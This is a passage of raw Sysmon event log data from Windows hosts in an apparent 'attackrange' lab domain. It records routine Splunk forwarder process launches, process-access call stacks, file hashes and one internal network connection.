16:26:24.705{7F8C56E7-5130-6063-0F01-00000000AF01}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001060664Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:24.125{7F8C56E7-5130-6063-0E01-00000000AF01}56322548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060663Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:24.000{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-5130-6063-0E01-00000000AF01}5632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060662Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:24.000{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060661Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:24.000{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001060660Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:24.000{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A832EC3938B843DB82F3F8FBC70BD25,SHA256=84D4D415C185728C021F91BF567F7318B9B06174FEFD7956EA617BBAC7C2B1AB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060659Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:24.000{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060658Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:24.000{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060657Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:24.000{7F8C56E7-4E3A-6063-0500-00000000AF01}412428C:\Windows\system32\csrss.exe{7F8C56E7-5130-6063-0E01-00000000AF01}5632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001060656Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:24.000{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-5130-6063-0E01-00000000AF01}5632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001060655Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:24.001{7F8C56E7-5130-6063-0E01-00000000AF01}5632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000245307Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.968{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-5130-6063-A222-00000000AF01}816C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245306Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245305Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245304Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245303Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245302Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245301Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245300Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245299Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245298Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245297Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.968{CB4067E1-304A-6062-0500-00000000AF01}392936C:\Windows\system32\csrss.exe{CB4067E1-5130-6063-A222-00000000AF01}816C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245296Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.968{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-5130-6063-A222-00000000AF01}816C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245295Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.969{CB4067E1-5130-6063-A222-00000000AF01}816C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000245294Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:23.632{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64740-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000245293Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.297{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-5130-6063-A122-00000000AF01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245292Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.297{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245291Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:24.297{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245290Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 